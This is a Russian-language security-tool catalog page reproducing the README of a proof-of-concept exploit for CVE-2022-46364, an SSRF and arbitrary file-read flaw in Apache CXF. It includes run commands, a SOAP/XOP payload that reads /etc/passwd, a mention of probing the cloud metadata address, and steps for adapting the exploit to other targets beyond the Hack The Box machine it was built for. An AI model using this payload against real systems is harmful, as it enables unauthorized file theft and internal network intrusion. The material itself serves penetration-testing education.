Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-46364 — PoC-эксплойт для CVE-2022-46364, уязвимости SSRF в Apache CXF, позволяющей читать произвольные файлы и зондировать внутреннюю сеть с помощью специально созданных MTOM/XOP SOAP-запросов. | Kitploit
Инструменты/GitHubGitHub/c0gnit00/cve-2022-46364
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

PoC-эксплойт для CVE-2022-46364, уязвимости SSRF в Apache CXF, позволяющей читать произвольные файлы и зондировать внутреннюю сеть с помощью специально созданных MTOM/XOP SOAP-запросов.

Репозиторий
12 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (File Read)

Proof-of-Concept эксплойт для CVE-2022-46364 — SSRF-уязвимости на стороне сервера Apache CXF при обработке запросов MTOM/XOP.


Сводка уязвимости

CVE-2022-46364 затрагивает Apache CXF версий до 3.4.10 и 3.5.5. Когда MTOM (Message Transmission Optimization Mechanism) включён на SOAP-сервисе, демаршаллер CXF некорректно проверяет атрибут href внутри элементов <xop:Include>. Вместо того чтобы ограничивать href URI со схемой cid: (как того требует спецификация W3C XOP), CXF разыменовывает произвольные URI — включая file://, http:// и https://.

Это позволяет неавторизованному атакующему:

  • Читать произвольные локальные файлы (file:///etc/passwd)
  • Выполнять SSRF против внутренних сервисов (http://169.254.169.254/)
  • Потенциально получать доступ к метаданным облачных провайдеров или внутренним API

Цель

Данный PoC написан и протестирован против машины Hack The Box:

Целевая конечная точка: http://devarea.htb:8080/employeeservice

Однако небольшие изменения XML-нагрузки в соответствии с WSDL цели позволяют адаптировать его под другую среду.


Использование

Чтение /etc/passwd (по умолчанию)

По умолчанию URL: http://devarea.htb:8080/employeeservice.

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd

Кастомный URL цели

root@kitploit:~
python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

Подробный режим — показать запрос и необработанный ответ

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd --verbose

Адаптация к другим целям

Важно: Этот скрипт жёстко привязан к структуре WSDL машины HTB DevArea. Чтобы использовать его против другого уязвимого Apache CXF-сервиса, вы должны изменить SOAP-нагрузку внутри build_payload() в соответствии с WSDL-контрактом цели.

Шаги адаптации:

  1. Получите WSDL от цели:

    root@kitploit:~
    curl http://target:8080/employeeservice?wsdl
    
  2. Определите детали сервиса:

    • targetNamespace (например, http://devarea.htb/)
    • Название операции (например, submitReport)
    • Структуру параметров (например, <arg0> с вложенным <content>)
  3. Измените нагрузку в build_payload():

    • Обновите пространство имён (xmlns:dev="...")
    • Обновите название операции (<dev:submitReport>)
    • Обновите обёртку параметров (<arg0>)
    • Разместите <xop:Include href="file://{filepath}"/> внутри поля, которое сервер будет обрабатывать как вложение
  4. Обновите --url при запуске скрипта.

Пример адаптации WSDL

Дан фрагмент WSDL:

root@kitploit:~
<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

Ваша нагрузка должна стать такой:

root@kitploit:~
<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

Как это работает

  1. Скрипт формирует HTTP-запрос multipart/related с Content-Type: application/xop+xml.
  2. В теле SOAP размещается элемент <xop:Include href="file:///etc/passwd"/>.
  3. Уязвимый сервер CXF воспринимает его как ссылку на вложение и разыменовывает URI file://.
  4. Содержимое файла считывается, кодируется сервером в base64 и возвращается внутри SOAP-элемента <return>.
  5. Скрипт извлекает base64-строку после Content: и декодирует её.

Ссылки

РесурсСсылка
Предупреждение Apache CXFCVE-2022-46364
Запись в NVDNVD — CVE-2022-46364
Apache Jira (CXF-8706)CXF-8706
Спецификация W3C XOPXML-binary Optimized Packaging
Глубокий разбор PenligentCVE-2022-46364 PoC in Practice
HTB DevAreaHack The Box — DevArea

Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Всегда получайте явное разрешение перед тестированием систем, которые вам не принадлежат. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.


Лицензия

Лицензия MIT — можете свободно использовать, изменять и распространять с сохранением авторства.

Скачать инструмент